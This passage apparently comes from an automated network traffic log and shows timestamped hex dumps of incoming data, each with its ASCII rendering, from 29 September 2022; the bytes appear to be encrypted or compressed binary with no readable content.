                                                                                                                                                    2022-09-29 12:59:14 UTC18887INData Raw: a8 af 53 19 91 b8 50 92 91 17 43 6a a3 fd 9b 38 02 fd 3e 6c 48 aa cb ce 04 57 e8 c6 94 da c3 0d 1b 0d 7d fa ad ca a3 f4 b5 45 4c ed 86 e8 d3 5a e9 59 c6 83 00 e2 59 09 84 ae fe ae 0b c0 57 ac 74 7f f8 d4 47 43 96 f7 a5 ab 40 d5 bf cf 25 a0 51 8c 86 54 77 49 61 1c 8f 58 a6 ed 79 6e 34 5a 60 9a 46 f4 29 a3 b7 bc 38 9f 25 10 80 26 c3 5b 22 28 47 86 b3 eb 7b 02 c9 81 e0 9d 0a 6e 81 dc bf 17 ab 85 20 d0 c4 c7 8e 38 75 6c e8 92 70 79 41 b0 0e 1b e4 30 73 44 5e d5 17 c5 88 50 83 f1 2e a9 f0 d9 8c 84 d6 09 97 d3 c2 b3 99 2d d1 3f 49 a5 2d 1d cd 90 05 2a 74 79 79 7e 76 92 ad d1 12 38 9f b9 1e 51 aa da f6 93 59 6c b2 36 5e a9 8c f5 27 89 c1 c9 f6 5a b4 83 ad cf ad ff 07 bd ba 12 16 c8 38 89 24 48 5f 52 f3 0e 3a b0 97 8f 7a ec 83 ae 11 48 26 cc 9d 89 f9 43 99 2f db
                                                                                                                                                    Data Ascii: SPCj8>lHW}ELZYYWtGC@%QTwIaXyn4Z`F)8%&["(G{n 8ulpyA0sD^P.-?I-*tyy~v8QYl6^'Z8$H_R:zH&C/
                                                                                                                                                    2022-09-29 12:59:14 UTC18903INData Raw: 32 3d c7 65 85 0c 82 04 9b b9 db e8 ee 1a 47 28 11 34 78 db 3f 5f c6 7a 65 85 76 97 c3 0b 29 b8 07 04 2a 9c 17 96 b9 2f b6 38 13 df de 97 ef b2 e5 3e ce 75 3b d1 98 ad 51 55 8e 3e 1d 81 d1 33 94 aa 18 56 13 b7 9d 3e 56 05 c9 3f 31 72 5b 4e 2f a2 55 b5 b1 40 3e 8a 9d 9c 74 8c 9f f7 0d 02 f5 dd 7f 72 47 8a 23 35 51 83 4e c5 19 80 14 64 cd 3a 72 4e ef 49 ac 22 51 41 9c 97 66 f7 a0 42 f0 17 9c 0d aa eb 22 fb 56 9f ce 88 52 77 61 d1 83 12 06 a4 c5 b3 f3 84 99 04 26 a3 1a 4b 31 13 82 3a 15 83 16 ff fe a4 ad 73 ee b8 9d eb 18 ec 7a df 63 af 56 35 5a 5d bf 96 b3 d9 d7 62 d7 a8 7a 00 67 2e f3 dd ad d3 a4 13 e7 d9 3d 12 a3 25 a8 48 5a ee 1f a9 8a 02 2b 13 c7 5f d8 eb 03 44 fb e4 6a e6 78 7c 1b bf d4 a8 10 a7 36 09 8c 25 90 34 65 0b f5 79 1c 83 70 dc c8 24 b9 41 44
                                                                                                                                                    Data Ascii: 2=eG(4x?_zev)*/8>u;QU>3V>V?1r[N/U@>trG#5QNd:rNI"QAfB"VRwa&K1:szcV5Z]bzg.=%HZ+_Djx|6%4eyp$AD
                                                                                                                                                    2022-09-29 12:59:14 UTC18919INData Raw: 03 51 6d d6 d2 30 23 f1 e2 ad e9 db 80 0f 9a 9a 26 a7 f4 4b 49 8d ce 0d 48 62 71 db 72 56 c4 d2 46 1d 4a 08 e3 9f 8b 9c fa 0a 96 ff cb bb 65 87 2d 55 e2 a0 b4 2e 9e 39 36 0f 6c ac ea be fd 16 08 68 62 44 fd 8b 35 2e fb 65 e0 bd d1 27 81 aa 54 44 b7 06 e7 eb 3c f0 a2 9b b5 80 db ea 51 7f 93 02 ec ec 25 42 c2 2c 65 09 f8 b9 8d ba 05 c6 da 20 ea 07 2b 0d cc bb 65 f4 54 cc 3b 8b 94 1d 33 8d ac ce 56 9d 94 35 b5 be 8f 92 b1 af ad 8f 36 09 21 19 29 58 86 c6 95 2c 21 65 f9 62 a1 f4 36 ed bb a3 94 57 0a 45 76 00 05 35 c9 00 76 e9 2b 17 d0 ca bb e0 85 0f 2d 02 7b bd 28 07 99 16 0b 75 48 8e 97 64 b8 2a 44 36 67 aa 89 01 5d f7 bc ae d4 1e 60 17 b2 b9 6f ce b1 b4 9b 87 14 f4 08 92 06 ac 1b 57 7b 0d 11 eb 4e d2 8f 92 bb 44 20 07 39 c1 16 7e 6e 4b cf d8 6a 2c 28 de d1
                                                                                                                                                    Data Ascii: Qm0#&KIHbqrVFJe-U.96lhbD5.e'TD<Q%B,e +eT;3V56!)X,!eb6WEv5v+-{(uHd*D6g]`oW{ND 9~nKj,(
                                                                                                                                                    2022-09-29 12:59:14 UTC18935INData Raw: d8 40 ef 10 18 9d 19 ec d3 16 84 ca f0 5f 0b 97 c3 46 3c bd 2f 5f 4f 9b cf 4c cb cb c5 9c 6b 28 32 61 8e cc f3 9c 1b ab 29 8a e0 b0 f1 28 82 67 2c 7e ed 21 b7 19 c3 a5 c0 2f 4e a8 bd fa 08 16 0f 57 08 59 14 90 f6 a8 59 c0 81 f3 a7 03 86 c8 ee 98 8d fe cf f6 0a e9 ea 5f 72 36 43 1e 25 c8 75 2b f2 40 31 ca 3b d8 8d e0 b4 e2 a7 12 25 b0 89 e2 20 02 cc 99 12 c4 a3 c8 b4 b5 32 92 8b 01 58 dc f0 ce 58 02 a5 b3 5b 25 05 ac 0d e8 ad cc 3c 78 6b 06 08 b8 aa 27 32 de ff d1 60 4d fd a9 77 36 ea 73 0a 48 0f df b1 25 f7 2a 12 24 43 4d 9d e3 c3 97 da f9 b6 0f 15 be 82 0a 01 60 91 11 78 44 eb 95 44 c7 df 83 96 e5 36 5a 83 7b 6c a9 29 14 ad 52 48 df 34 bc b4 f0 aa 5e ce 17 5f ec d1 eb d1 a0 31 f4 23 17 c2 93 58 e6 d9 a3 bf c5 82 ba 5e 03 81 87 f0 e1 b0 16 1e c3 0c a8 8d
                                                                                                                                                    Data Ascii: @_F</_OLk(2a)(g,~!/NWYY_r6C%u+@1;% 2XX[%<xk'2`Mw6sH%*$CM`xDD6Z{l)RH4^_1#X^
                                                                                                                                                    2022-09-29 12:59:14 UTC18951INData Raw: 74 84 5e 33 f5 fd 78 27 6b 81 b0 91 ad b8 c8 bc 48 b6 fe ce ec 94 24 01 43 36 92 46 a7 c3 a6 4d 2d 69 0f 8d 9d 38 4b 2c c4 f0 90 7d 5f b4 44 8d cd 07 b8 25 aa cc 8d 68 4b d0 ef 93 cd eb 1e 96 42 75 ae 90 f0 da 93 c6 66 52 be ec 11 37 bb 54 94 9d 12 a1 12 9b 35 a0 71 cd 09 ba 5f 4f f5 d6 e2 91 bb d0 8b 03 9d 47 0a f4 6d 02 32 fe 86 2b 29 86 fa 06 1e 5f 68 50 8b d6 39 28 aa 1a 2e 55 13 bf 8c d7 fe 08 5f ec 16 3a c1 50 50 de 2b 7c ee 4e 6a ab c6 42 f3 05 35 5e c0 44 05 ab 64 87 dc 73 6b 3a 10 4f 50 96 67 68 38 4b df 43 0e de 80 c9 8f 80 86 68 d5 a7 52 bf 33 87 33 57 13 b5 fd a1 93 0b 59 f4 01 fc 1b 78 b1 a2 83 8b 2c 87 4f 3c 29 9e e7 e5 e4 f9 e1 cb 5d 97 c4 45 38 c8 08 a5 25 70 a3 71 0e 5c a2 31 bb f9 c9 24 5a b9 f8 bb 83 9e 40 c9 6f 02 99 1e 53 a5 b9 46 c9
                                                                                                                                                    Data Ascii: t^3x'kH$C6FM-i8K,}_D%hKBufR7T5q_OGm2+)_hP9(.U_:PP+|NjB5^Ddsk:OPgh8KChR33WYx,O<)]E8%pq\1$Z@oSF
                                                                                                                                                    2022-09-29 12:59:14 UTC18967INData Raw: 21 55 f7 a6 46 e9 83 f1 f0 0c 80 01 d9 a9 b7 e4 68 a8 6a d2 fe d2 9c 7f 19 c8 27 72 dc 5c 7f f5 da 7e f1 39 d2 8a 83 5e 72 fd 75 84 ca ea 03 b9 13 5e 7c ff 37 06 93 d1 de a8 fd a8 f9 45 c9 9c bd 2a ba 38 2d 4b 10 d3 93 69 cd 5a 95 cd 27 87 8f ad 83 1b 5e 55 73 bc b4 5f 4a ca 76 f5 dd 35 ab 2f b7 a2 86 0e d7 54 03 77 a3 a4 25 1e c3 b7 0a d6 8d e5 ec 7b e7 66 e8 d2 7a 4c fa 8a 82 6b b0 78 7f c9 27 84 0a 5a 87 3c ab 63 76 c3 d1 3e 87 65 45 d0 7f de f8 8e 76 4b 24 5b 17 de b9 45 49 58 9b d3 c2 e5 1c 01 6b 0f b1 79 02 21 11 5c 5e 0b 69 d3 80 ed 83 3b 5b 3b 96 9d e4 ac 0e c0 78 9b c8 8c 5c f6 18 83 4e f7 9f 7e c7 cc 96 ea 58 6c 24 74 97 e8 ea b6 c8 b2 3d 44 c2 de 00 cb da 8a 4c 44 2f 86 ef fd b7 a2 2f a9 a3 cf 00 00 d4 9f 1f 23 ed 44 7c 73 6a 71 02 2b 24 f1 1a
                                                                                                                                                    Data Ascii: !UFhj'r\~9^ru^|7E*8-KiZ'^Us_Jv5/Tw%{fzLkx'Z<cv>eEvK$[EIXky!\^i;[;x\N~Xl$t=DLD//#D|sjq+$
                                                                                                                                                    2022-09-29 12:59:14 UTC18983INData Raw: b9 47 93 20 89 d3 04 6a ca 27 37 c9 87 29 d9 c5 d6 33 3a 06 cc c8 88 5c c7 d2 ae 21 6f e4 b3 61 66 2d 88 9c 60 cc 62 ba 67 a2 cd 1d de 0e 52 93 ba 73 d7 93 f3 d8 c3 77 07 83 04 7e b5 4b ec 1f 5c 35 fb a5 45 f8 9b 5c 5f c5 9a a4 b7 87 a7 5a 4f df 70 f4 56 e9 5b f3 f8 bf c9 f3 2f 82 36 cf 58 c5 38 fd 27 eb ca 22 8c 73 84 14 d6 da 05 b5 50 a9 b4 1f c9 ae 41 a9 70 65 ee 78 49 fe 91 b4 86 f6 63 0d c8 26 9d c9 b4 29 9a 0f ca ad bf 20 e2 70 05 99 ff 09 11 85 96 a6 4b 72 d7 15 79 b5 4d ee 23 60 fe 7e 1c a7 72 45 eb fa b1 74 b4 7a d9 ee 3e fd 4e 42 b1 25 55 53 36 9e ec 2a 8e f2 32 54 ec b7 92 72 d9 15 65 79 d4 ce eb 85 ce 1f 6e be fe 43 12 1c 55 b5 8f df 9e a8 ff fe cb 80 6c bd d8 c7 88 2e f6 75 39 4c 5d 85 aa 3b b3 b6 f1 1f df a5 cf 7d 4f 77 d1 29 37 ce ca e0 1f
                                                                                                                                                    Data Ascii: G j'7)3:\!oaf-`bgRsw~K\5E\_ZOpV[/6X8'"sPApexIc&) pKryM#`~rEtz>NB%US6*2TreynCUl.u9L];}Ow)7
                                                                                                                                                    2022-09-29 12:59:14 UTC18999INData Raw: 2b fe bf a6 ee ed 86 65 27 f5 eb 03 99 6e f2 c3 3b ad b3 e4 0c d9 4f 4a 73 b6 db 26 8a 61 d4 f6 08 ad 06 3b 1f 4b 53 f4 fe 74 cb 41 c0 87 b1 0d d9 6d 88 b6 71 d6 a7 51 ba 6e 58 74 81 e7 2d 6c be 78 e0 9c 65 82 14 c7 4e 10 32 72 7a 56 06 a1 43 a1 c3 4c 28 99 4d b4 78 40 7d 7c 68 aa 85 75 3b 8b b8 44 ac 18 24 fb 2b dd 1f 1f 6c c7 56 14 c1 93 58 dd 48 26 12 4d 13 95 6f 50 bd de d3 71 09 9a 88 ee 5a 76 21 bb 7c 6b c4 b1 4b 01 22 0d 66 ba 0a 54 10 20 66 e4 20 d6 30 90 4d 87 13 7c 24 a8 95 10 0c ea 4c 79 01 bf 9b 93 f8 b8 68 e4 e9 19 23 5e 15 b0 20 e4 37 b3 03 52 02 7d c6 a2 66 28 d8 b3 51 11 73 8a 64 10 19 83 2f ae 23 63 bf b0 a2 d3 f4 d1 78 46 6f fe 03 52 0f 0c 48 56 97 a8 7a d7 0b 41 4c 15 07 5b bd 67 ea 53 50 01 cd ca 18 54 00 cd 53 95 4e 60 f0 c8 5a 0a b3
                                                                                                                                                    Data Ascii: +e'n;OJs&a;KStAmqQnXt-lxeN2rzVCL(Mx@}|hu;D$+lVXH&MoPqZv!|kK"fT f 0M|$Lyh#^ 7R}f(Qsd/#cxFoRHVzAL[gSPTSN`Z
                                                                                                                                                    2022-09-29 12:59:14 UTC19015INData Raw: 8d e2 6d 98 1b 71 98 87 82 49 bf 7e 76 99 bd c9 f6 d9 c2 8f 4d 8f 72 38 56 b5 ee 12 16 97 98 64 d5 41 ec 3e 60 69 3d 55 04 ba 54 c0 c8 ae 24 2c 34 99 46 fd 50 1e f9 8b c7 00 f0 cd 19 17 b8 11 31 5e d0 88 00 e7 5c f6 6c 71 9a 7f 7b ed 68 0a fe 2f 7f 18 41 69 a5 96 4e 7b b9 50 4c 34 da df 63 79 ea 04 4f 5e 2f 2d ea 11 d4 b1 fa 96 58 8c 75 83 22 26 92 9b 0a c0 22 27 22 af 52 6d e8 41 5b dc 91 18 e3 23 75 5e a7 82 a9 13 32 d2 c0 94 ce 27 ec 5e 6a 47 e2 ef de 31 33 3b 80 ad 07 2d f0 42 bb 61 d0 68 3b 6d 69 f9 e7 8b 13 48 54 22 60 27 b0 85 4d d3 2c 96 b1 1b 3d bf ca 4d fa 0c a7 c8 bc e1 d3 5f 26 04 6e 5f ce e2 6a 9b 4e b7 a3 d2 ed a6 42 e3 8a fd e4 e4 a1 1e c2 29 68 bc 3d 36 96 db fc e3 b4 32 ac 80 78 74 88 ff 19 cf f6 31 62 29 0f 9f 02 02 18 c6 5d 9d ae cd a6
                                                                                                                                                    Data Ascii: mqI~vMr8VdA>`i=UT$,4FP1^\lq{h/AiN{PL4cyO^/-Xu"&"'"RmA[#u^2'^jG13;-Bah;miHT"`'M,=M_&n_jNB)h=62xt1b)]
                                                                                                                                                    2022-09-29 12:59:14 UTC19031INData Raw: a7 a6 4c c4 37 a0 cb 2c 2e fd c9 2c eb 54 b9 b4 cd 92 da d0 32 5f cb ed e8 c4 f9 90 f5 55 e4 96 49 9c ce b5 7f bf 5e 8c 83 44 0e 00 de 12 4f d6 71 67 6c ca 03 f9 dc c9 7b 55 e2 a7 0e 67 aa 94 60 b8 48 24 93 76 6d ee 99 5a ff 42 50 ca 45 d6 a7 75 99 6e dd 3f 7c 55 3e d1 5f 1e a8 99 38 52 50 1e e7 a9 a6 ef 15 e9 39 35 be 1a 06 c8 ba 3f 7c ce 69 40 31 2a 25 79 69 07 1f 07 03 1c 51 53 cc c7 30 3e 35 27 14 22 24 a4 cc 8d ed fb 06 35 58 75 a4 28 6d 3d 62 ae 8d ec 3a 3b 7b b6 3d 10 0d 40 ee 2c a9 cd 3d 31 b9 b8 be 60 89 86 6b db 37 b9 37 cf 3d 9f e4 ee a4 7d ee e8 fe 17 79 8c 59 39 5c 06 89 11 a6 ec 10 f6 ea 5e 13 0a 88 f2 d0 da bd 9e bd b0 e8 63 cf 36 fa e0 b9 92 31 11 c7 7b 26 a0 a4 6d 02 33 db 32 5f fd 2a 8e 5e 45 0b cb 7c 81 2c c7 cf cd 15 ce 32 b0 c5 52 8d
                                                                                                                                                    Data Ascii: L7,.,T2_UI^DOqgl{Ug`H$vmZBPEun?|U>_8RP95?|i@1*%yiQS0>5'"$5Xu(m=b:;{=@,=1`k77=}yY9\^c61{&m32_*^E|,2R
                                                                                                                                                    2022-09-29 12:59:14 UTC19047INData Raw: 1f fa b4 8a 4c 38 80 c7 c2 3b 73 5e 2e f4 50 b1 54 16 8e aa d4 6f 1d 21 e5 86 05 fd 0c 0b d8 76 c3 4c 4c ae eb 2f 28 25 9f 11 1b 39 3c 8e a5 6b 0c f7 42 c5 be a3 d7 3f 43 5d 92 4e 20 44 61 7c 18 1f f7 21 4c 43 b4 d7 ce c7 bd 71 d1 ef 11 81 93 43 3c af 95 50 cd e6 cf eb e0 a4 0e ab 57 0e 16 5b db c1 e7 cf 06 1c 00 23 b0 67 10 61 29 82 8d 13 ff dc 0f 6c a6 12 f5 7a 9b a1 5e 07 2d 03 24 40 98 1d 0d ae aa 7e 26 b3 2e 36 3c 60 01 05 91 26 58 d3 9b 1e a5 84 7a cf 18 83 19 70 03 76 ca 57 b8 0d 49 12 0c 54 cb 7f c5 1d cb bf fd a7 c7 0c 64 e6 75 6b 91 45 c9 6e 48 c7 f6 87 22 94 b1 14 19 e7 e0 ce c9 fc 87 dd 27 07 09 41 02 65 97 d0 74 26 45 ae 18 e4 88 34 23 aa 32 dc 59 dc 28 01 fc de 9f 77 e6 ca bd 42 36 46 a1 5a 2d be ce eb 1a d6 ea fb ed 26 c3 17 0f 4f 94 f0 b9
                                                                                                                                                    Data Ascii: L8;s^.PTo!vLL/(%9<kB?C]N Da|!LCqC<PW[#ga)lz^-$@~&.6<`&XzpvWITdukEnH"'Aet&E4#2Y(wB6FZ-&O
                                                                                                                                                    2022-09-29 12:59:14 UTC19063INData Raw: e9 3f 2b ea b5 d7 eb 43 b4 fb f6 31 b2 79 f6 a6 78 b1 44 a5 0e 83 d0 f1 48 44 8d b5 21 6c 6e 47 75 e7 8f 80 84 a8 8d f5 dc eb dc 3c 3a c8 43 fc d4 64 03 0e 4d 7e b8 64 23 2e a5 ec 0c ae 47 46 6d 71 9f 5d c9 cc b3 22 b6 21 f8 c5 90 68 c7 df 89 08 c4 66 27 d0 a8 6f 91 19 e3 31 c9 fb 62 89 08 bc 7c c1 90 03 02 68 ad b1 44 0d 5d 09 84 e2 94 57 a8 a1 02 fb f1 00 a1 da a6 46 bb 06 63 6b d3 ac 2d 38 c3 b4 f4 c9 96 56 ef 19 8d 94 b6 dc 6c 03 a4 95 78 6d fc 40 a0 2e 9c 81 85 b5 c5 a7 aa fb ab 94 7c 51 fe 89 4c 98 ef e6 e9 33 7c f2 23 21 22 36 66 c3 9d 5b c0 74 39 c8 02 51 7f ad a2 63 1a 17 98 ab 34 42 85 1e 49 53 80 c1 48 7b 36 9a 5c db b4 79 13 67 9e 44 97 86 54 b2 c2 57 80 c3 12 41 0a 53 fb 71 7e 4c 0a 31 34 46 27 39 57 89 6a 42 f8 c7 7f 99 88 7c e1 64 db 57 80
                                                                                                                                                    Data Ascii: ?+C1yxDHD!lnGu<:CdM~d#.GFmq]"!hf'o1b|hD]WFck-8Vlxm@.|QL3|#!"6f[t9Qc4BISH{6\ygDTWASq~L14F'9WjB|dW
                                                                                                                                                    2022-09-29 12:59:14 UTC19079INData Raw: 03 b3 ef 11 b7 20 f3 6e 95 1d e3 28 24 10 7a ef 81 bf 0b 11 27 11 09 d6 43 f8 2e 05 bf bf 2b 04 62 28 29 de 66 c2 c9 79 94 7b cd 41 e1 03 5f 8e 9d fc d3 fd 0c 80 ea 98 13 c2 84 33 d1 79 47 0b f9 71 8c de 97 57 00 48 20 f9 2c 18 9e 68 70 03 c2 e9 7c db eb ab 11 5e 71 b1 5a af 00 58 8f 17 77 c7 61 f6 7a ef 10 8f 38 56 03 58 d8 39 7c 22 03 53 83 29 5d 4d 21 d8 e8 e1 c5 41 e7 96 8c f5 0c 97 89 ec 3c 09 8e 80 db 84 16 1a 04 e9 45 4c 79 6f f7 e3 ba 57 3b 81 e4 cd 14 9b 77 d4 d3 13 80 70 2f 9e 09 75 af 5c 3f 22 66 52 68 87 7c 02 5d 14 ba 88 42 30 46 c4 8f 09 6e 21 bc 21 02 ce ca a6 86 69 66 90 8c ad 18 f7 3e e0 a6 4a e0 18 6c 7b 33 ff 99 3c 4e d1 d4 c4 7e 4e 83 0f 98 e2 3d 04 54 56 b6 0d 80 13 75 74 d6 39 e3 97 da 30 00 39 0e f6 63 94 f9 6b a8 38 89 ca 01 6d d2
                                                                                                                                                    Data Ascii: n($z'C.+b()fy{A_3yGqWH ,hp|^qZXwaz8VX9|"S)]M!A<ELyoW;wp/u\?"fRh|]B0Fn!!if>Jl{3<N~N=TVut909ck8m
                                                                                                                                                    2022-09-29 12:59:14 UTC19095INData Raw: a4 44 db af c6 07 c2 24 1d b7 4f 24 26 f6 bb 2e 14 92 38 61 f6 5b fb 01 e1 db 7f 79 85 e0 47 9b b0 df 14 03 a3 6a 5b bb 00 4f 28 47 7f d9 8e d8 dc ad b8 c0 70 ee ec d5 2d 9b ac 5e 5f 72 96 06 54 9d 2f c2 9e c1 85 d7 82 20 e3 fd cf ec 44 d8 89 c8 14 cd ef 9d 35 e7 5f 49 20 72 95 c9 4e 73 22 be e4 64 49 61 42 41 94 94 38 4e ec e1 6d 58 e2 5c 51 5a 94 e4 30 4c c7 f8 cc 98 10 71 fe dc aa e7 bd 07 6e 08 47 c2 22 35 e6 20 08 2d 76 89 3f 9d 1a 91 35 eb be ab 2f 52 37 c0 dc aa 36 0e c2 b2 ba 8b 74 fe 6e e4 78 3b 1f f0 7f c5 eb ba bc 76 8e 1f c2 b3 e5 9a 06 59 0a 04 00 f7 9c e3 0f 70 8e 11 40 b1 55 25 0d 2c a7 40 0e 16 d7 8f fe 60 a3 50 ab c4 d0 0a 22 41 35 94 25 f6 64 38 97 e3 73 0d 15 96 d1 ef 89 38 37 27 79 fa 24 84 05 00 ca 26 b9 b5 99 e3 e1 05 73 68 dc fa 99
                                                                                                                                                    Data Ascii: D$O$&.8a[yGj[O(Gp-^_rT/ D5_I rNs"dIaBA8NmX\QZ0LqnG"5 -v?5/R76tnx;vYp@U%,@`P"A5%d8s87'y$&sh
                                                                                                                                                    2022-09-29 12:59:14 UTC19111INData Raw: cc 48 36 f0 3b 92 37 35 bc b0 03 dc 0c a9 9d 79 76 e2 c8 d4 df fe e5 5c 98 e3 01 ce 6e 2b 29 14 52 c6 f0 f2 e9 76 5b dc 09 85 4d 92 45 9e 42 9c 79 49 d7 a4 8f 1d be 0a 0e f2 f6 5e 6a 2b 7f 57 46 e5 22 0f b6 41 c7 7d 26 22 19 25 d4 40 60 2f 16 79 7b b2 fc 06 7b 85 b8 43 f6 73 1d 07 ad 31 c9 39 10 ea 73 e0 be a0 b4 a4 8c 4f 9c d0 6e df f5 0b 1b de b6 de c6 11 97 2f 7e a3 57 c9 35 e9 0f 29 13 c4 28 f8 89 07 c0 65 08 fe c6 e0 c3 8e e0 5a c4 bf 0c 2c 15 cf 86 a2 32 0f 85 1c 4a 7d b9 da d5 ed 68 9b 80 ee 9a 67 9e 39 00 a1 41 5d bd 5b 26 b0 fe b9 d9 f1 69 86 89 99 a2 d7 67 c4 aa 91 7b 60 99 07 76 40 ea 99 c0 2e de b5 52 cb 9b a8 c1 e9 e0 bb 65 01 34 f8 a6 e8 bf fc 60 2a 92 06 63 35 0b 59 d6 6a 62 b2 ba ef b4 29 b6 d9 71 c0 0a 16 e8 82 83 09 cb 61 28 7f 73 14 e9
                                                                                                                                                    Data Ascii: H6;75yv\n+)Rv[MEByI^j+WF"A}&"%@`/y{{Cs19sOn/~W5)(eZ,2J}hg9A][&ig{`v@.Re4`*c5Yjb)qa(s
                                                                                                                                                    2022-09-29 12:59:14 UTC19127INData Raw: 97 30 a8 37 bd 7b ac 75 fc 70 9d f5 1b d5 f3 30 2a b3 8d ca 77 cd b3 97 71 9a 23 76 c8 97 77 cb e6 ce f1 30 f5 ce 61 f9 0d b2 d5 15 a0 7d e7 7b 09 b3 29 f9 ee f1 22 0a 97 ca f6 7c f1 0a 64 e3 c3 60 7b 83 41 80 8d 47 f7 9b 0b 74 84 31 a1 5b db db 12 cd b9 e7 f3 af 1b 39 c1 06 9e 0b 96 ca e1 db 27 f7 87 3c bc 9b 84 1a 74 2e 5e 23 fe dd f0 e4 61 8e fe 83 f2 63 51 69 f8 ab 2c fe 6f 5c 8a 04 c0 13 de 8e 63 4a ff 4a 35 88 1b 66 2d 80 6f 0c 75 e1 31 5a 49 6a b8 61 60 4d ef f3 c0 53 af f5 c8 85 14 02 25 d5 14 53 f2 c5 73 86 77 a2 bb ce 17 d6 06 43 75 6c b6 55 68 6b b5 43 28 57 8f c5 c5 f9 20 dc 32 9f b8 f7 68 80 56 51 4b 3c 4b 62 09 d3 5a c7 af 12 84 ec f9 75 04 15 e1 50 2d 90 78 15 e1 8d 21 31 69 8a d1 34 12 78 8b 4c ea 3c fc f5 29 f6 b9 95 31 d4 a8 29 ad d8 f8
                                                                                                                                                    Data Ascii: 07{up0*wq#vw0a}{)"|d`{AGt1[9'<t.^#acQi,o\cJJ5f-ou1ZIja`MS%SswCulUhkC(W 2hVQK<KbZuP-x!1i4xL<)1)
                                                                                                                                                    2022-09-29 12:59:14 UTC19143INData Raw: 9f f3 89 8e 2a b3 a8 50 30 3d e5 56 43 12 f8 bc ea cb 95 9f 95 44 e9 f4 e8 14 28 96 fb 11 fe ff e1 8d 77 1e f7 7d 52 fa f2 7e 15 b4 06 1f 61 94 36 42 60 ad ef 78 9f ee 10 9b 63 44 1f 0a b1 0b 78 1c f8 4d 48 e6 0d 3d 0a 9a 96 05 9d 46 4a 4c 0a a7 da a4 8f c7 ce 0f 80 b4 85 b0 e9 85 a3 e4 a1 f7 42 09 b8 86 37 0a e1 69 90 fa 1e d8 e2 1c 67 22 da 64 d6 cc b9 55 31 2a 60 29 9a 34 8b 10 1d 95 ad b9 56 a9 75 65 26 1e c3 4d d0 ca 58 01 2e bb 7e dd e3 fd ac ff 64 94 f1 c4 35 6e 37 88 71 8f d5 0f 36 f3 1a 68 f4 3c b6 16 d2 cc 40 ce 45 3c 93 8b 1e 31 e0 61 75 c8 ef c7 e8 25 8d 54 3c 66 76 85 4a 3f de 72 2c b7 88 f0 22 5d a9 80 2a f8 aa 8a 2c df 0d a7 ab 96 9f f1 0b 66 b1 ca 34 07 97 f0 aa 20 36 71 1a b8 1e aa 5a 8d 40 94 e1 8d 91 68 79 75 2d 39 5e 00 2e a3 1b f7 74
                                                                                                                                                    Data Ascii: *P0=VCD(w}R~a6B`xcDxMH=FJLB7ig"dU1*`)4Vue&MX.~d5n7q6h<@E<1au%T<fvJ?r,"]*,f4 6qZ@hyu-9^.t
                                                                                                                                                    2022-09-29 12:59:14 UTC19159INData Raw: e2 9b d0 b7 61 2b 57 ea 0e 3f 6c 9d bd 4e b7 87 4e 1c 5a 76 fa 8a 1c 14 89 e9 b8 7a 19 3e 28 f3 69 35 9b 5b 29 f4 5c 66 5e 3e 1f d8 df d5 13 c8 1e 08 58 0d 9f 46 d7 31 3f cb 21 90 dd b1 ec f0 51 90 8e d2 6f fd 64 20 39 11 d3 82 2d 5c 27 a9 80 b7 e1 87 21 3e 05 c1 0b 95 ef d2 b1 81 a0 16 28 03 72 b0 a0 7c fe 09 7c a5 62 9c 99 dc c6 b3 18 bf f2 26 c4 bd 3a 14 e0 0d 80 d0 2c 18 22 6e 34 90 e2 a7 7c b2 f6 e8 25 51 8b 9a 5b fe 0d 30 89 31 70 42 cf fb 3f a7 8c d3 20 90 f4 a9 bb ea 6c f7 77 c4 f3 2d d4 55 6d ad 5c 01 b2 59 44 b4 ef e9 1d 25 f5 c9 60 57 13 5b 8b 08 a4 9e e3 73 9e b6 ce 92 9a aa 41 77 88 2f 95 4f 4d 32 8e 19 31 dc a5 1f 87 c2 cf 2b d6 52 f0 2a 20 73 b1 f4 e0 3f 0e e3 92 71 d9 e1 b3 8e dc 3d ad 31 30 b6 4e c4 25 59 fa bd 53 c5 a1 5c 14 c6 88 33 c0
                                                                                                                                                    Data Ascii: a+W?lNNZvz>(i5[)\f^>XF1?!Qod 9-\'!>(r||b&:,"n4|%Q[01pB? lw-Um\YD%`W[sAw/OM21+R* s?q=10N%YS\3
                                                                                                                                                    2022-09-29 12:59:14 UTC19175INData Raw: 42 07 13 f5 7e ae 51 5b 20 b6 c0 30 b0 70 ac fb 8a 06 95 a2 b7 86 15 44 c9 1f b7 cf 09 df b3 76 23 f9 3a a1 06 fd 10 97 ae c5 ed 2b 95 7d 5f 1c 74 7f 9d 28 0d 02 dc db aa 4b bb 5e 34 b0 ae 38 6f e6 61 dc 37 d1 4f 6b d4 45 19 b1 6a 59 1d 89 1f 5a ef 07 50 22 3e 2f 4e 34 28 08 21 ff 8a 04 ea d8 de d6 11 ce d2 d8 5e 27 71 46 3f 76 e1 6b ab e9 8d a2 4a 5e de 55 10 aa 34 40 f6 5c 01 f1 fe 8c a3 74 a0 a6 4c 94 1f 8e 56 39 29 e9 65 cb 33 4f 91 55 af 3e 4c 2e 91 8c 29 ce 65 ec 0b 8b 2c 66 cc 8f 3f 54 82 9b 9c e3 92 6f 74 f6 21 0e c5 88 e9 e7 31 be 8b e1 d4 29 8b 50 58 6e 9a ef d4 b3 16 14 b9 ce e1 fe 30 e8 72 4a ea 3d da 0d 50 82 d1 6a 9c b4 f4 74 aa a5 52 57 86 8a 80 92 f1 20 7a 16 49 a8 82 ed 4d 35 4d 60 36 30 bc 4d f6 29 ad b9 7b 87 a2 06 57 4f 07 36 13 81 64
                                                                                                                                                    Data Ascii: B~Q[ 0pDv#:+}_t(K^48oa7OkEjYZP">/N4(!^'qF?vkJ^U4@\tLV9)e3OU>L.)e,f?Tot!1)PXn0rJ=PjtRW zIM5M`60M){WO6d
